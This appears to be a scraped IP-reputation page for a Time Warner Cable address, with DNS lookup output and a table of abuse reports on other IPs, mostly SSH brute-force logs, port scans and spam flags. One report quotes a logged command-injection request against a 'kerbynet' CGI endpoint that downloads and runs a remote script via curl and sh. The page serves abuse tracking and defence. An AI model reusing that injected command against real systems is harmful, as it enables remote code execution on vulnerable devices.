City: unknown
Region: unknown
Country: United States of America (the)
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
        ; <<>> DiG 9.10.3-P4-Ubuntu <<>> 107.14.20.199
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26503
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;107.14.20.199.			IN	A
;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025022200 1800 900 604800 86400
;; Query time: 16 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Feb 22 22:20:03 CST 2025
;; MSG SIZE  rcvd: 106
        199.20.14.107.in-addr.arpa domain name pointer clevoh-iq-ivms0004.conops.timewarnercable.com.
        Server:		183.60.83.19
Address:	183.60.83.19#53
Non-authoritative answer:
199.20.14.107.in-addr.arpa	name = clevoh-iq-ivms0004.conops.timewarnercable.com.
Authoritative answers can be found from:
        | IP | Type | Details | Datetime | 
|---|---|---|---|
| 5.206.227.228 | attack | 52.186.167.96 - - [05/Aug/2020:10:00:51 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 162 "-" "-"  | 
                    2020-08-05 17:13:59 | 
| 168.194.13.25 | attackspambots | 2020-08-05T04:40:01.470981shield sshd\[17979\]: Invalid user ABCd\)1234 from 168.194.13.25 port 55478 2020-08-05T04:40:01.479361shield sshd\[17979\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=mkauth-netmania.flashnetpe.com.br 2020-08-05T04:40:03.313853shield sshd\[17979\]: Failed password for invalid user ABCd\)1234 from 168.194.13.25 port 55478 ssh2 2020-08-05T04:44:40.770029shield sshd\[18724\]: Invalid user www.linkidc.com from 168.194.13.25 port 38306 2020-08-05T04:44:40.778646shield sshd\[18724\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=mkauth-netmania.flashnetpe.com.br  | 
                    2020-08-05 16:57:28 | 
| 141.98.9.157 | attackbots | [portscan] tcp/22 [SSH] [scan/connect: 8 time(s)] in blocklist.de:'listed [ssh]' in DroneBL:'listed [Unknown spambot or drone]' *(RWIN=29200)(08051135)  | 
                    2020-08-05 17:08:15 | 
| 128.201.78.220 | attackspam | $f2bV_matches  | 
                    2020-08-05 16:49:56 | 
| 182.75.216.74 | attack | Aug 5 06:56:38 nextcloud sshd\[6150\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=182.75.216.74 user=root Aug 5 06:56:40 nextcloud sshd\[6150\]: Failed password for root from 182.75.216.74 port 26593 ssh2 Aug 5 06:59:35 nextcloud sshd\[8948\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=182.75.216.74 user=root  | 
                    2020-08-05 16:48:14 | 
| 37.77.122.234 | attackbotsspam | Brute forcing RDP port 3389  | 
                    2020-08-05 17:01:37 | 
| 139.155.29.188 | attackspambots | REQUESTED PAGE: /index.phpTP/public/index.php  | 
                    2020-08-05 17:10:03 | 
| 164.132.255.116 | attack | Email rejected due to spam filtering  | 
                    2020-08-05 17:06:09 | 
| 58.87.113.79 | attackbotsspam | Failed password for root from 58.87.113.79 port 44082 ssh2  | 
                    2020-08-05 17:23:35 | 
| 141.98.9.156 | attackbots | Aug 4 17:20:06 vm0 sshd[31670]: Failed password for root from 141.98.9.156 port 33037 ssh2 ...  | 
                    2020-08-05 16:51:39 | 
| 197.248.38.174 | attack | 
  | 
                    2020-08-05 16:52:56 | 
| 141.98.9.137 | attack | SSH Brute-Force attacks  | 
                    2020-08-05 16:48:42 | 
| 5.188.210.139 | attackspam | SIP/5060 Probe, BF, Hack -  | 
                    2020-08-05 17:11:17 | 
| 139.226.35.190 | attackspambots | Aug 5 03:49:05 124388 sshd[18815]: Failed password for root from 139.226.35.190 port 47585 ssh2 Aug 5 03:50:09 124388 sshd[18966]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.226.35.190 user=root Aug 5 03:50:11 124388 sshd[18966]: Failed password for root from 139.226.35.190 port 28707 ssh2 Aug 5 03:51:14 124388 sshd[19021]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.226.35.190 user=root Aug 5 03:51:16 124388 sshd[19021]: Failed password for root from 139.226.35.190 port 9185 ssh2  | 
                    2020-08-05 16:48:54 | 
| 189.39.120.2 | attack | B: Abusive ssh attack  | 
                    2020-08-05 17:19:09 |